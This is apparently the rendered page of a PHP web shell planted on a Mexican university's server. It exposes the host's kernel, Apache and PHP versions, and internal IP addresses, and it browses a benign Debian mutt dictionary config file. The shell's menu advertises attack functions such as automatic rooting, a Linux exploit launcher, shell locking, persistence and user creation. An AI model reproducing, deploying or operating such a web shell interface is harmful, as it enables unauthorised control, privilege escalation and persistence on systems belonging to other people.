Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
share /
dictionaries-common /
[ HOME SHELL ]
Name
Size
Permission
Action
site-elisp
[ DIR ]
drwxr-xr-x
dc-debconf-default-value.pl
14.37
KB
-rw-r--r--
dc-debconf-select.pl
11.88
KB
-rw-r--r--
elanguages
0
B
-rw-r--r--
mutt-ispell-init
1.04
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mutt-ispell-init
# File: ispell-init -*- muttrc -*- # Description: Mutt initialization for dictionaries-common support # Author: Rafael Laboissière <rafael@debian.org> # Created on: Fri Nov 16 18:24:36 CET 2001 # Copyright (C) 2001-2009 Rafael Laboissiere # ------------------------------------------------------------------ # This file is part of the Debian dictionaries-common package. # Released under the terms of the GNU GPL (version 2 or later). # No warranty. # Usage: # Just put 'source /path/to/this/file/mutt-ispell-init' in ~/.muttrc. # The `I' key will call the ispell-select script, which uses # iselect to interectively choose the ispell dictionary for # subsequent spell checkings. If iselect is not intalled in the system, # a fallback rudimentary interface is used. # # Unsetting the wait_key configuration variable is recommended, since # a shell-escape function is called. macro generic I "<shell-escape>/usr/bin/select-default-iwrap\n" \ "Select the default ispell dictionary for use with ispell-wrapper" set ispell = "/usr/bin/ispell-wrapper"
Close